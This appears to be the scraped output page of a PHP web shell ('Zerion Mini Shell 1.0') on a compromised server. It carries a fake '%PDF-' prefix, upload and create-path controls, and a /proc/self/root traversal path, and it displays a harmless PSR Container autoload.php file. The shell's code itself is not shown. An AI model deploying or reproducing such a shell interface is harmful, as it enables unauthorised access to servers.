%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/proc/thread-self/root/usr/share/php/Psr/Container/
Upload File :
Create Path :
Current File : //proc/self/root/proc/thread-self/root/usr/share/php/Psr/Container/autoload.php

<?php
// @codingStandardsIgnoreFile
// @codeCoverageIgnoreStart
// this is an autogenerated file - do not edit
spl_autoload_register(
    function($class) {
        static $classes = null;
        if ($classes === null) {
            $classes = array(
                'psr\\container\\containerexceptioninterface' => '/ContainerExceptionInterface.php',
                'psr\\container\\containerinterface' => '/ContainerInterface.php',
                'psr\\container\\notfoundexceptioninterface' => '/NotFoundExceptionInterface.php'
            );
        }
        $cn = strtolower($class);
        if (isset($classes[$cn])) {
            require __DIR__ . $classes[$cn];
        }
    },
    true,
    false
);
// @codeCoverageIgnoreEnd

Zerion Mini Shell 1.0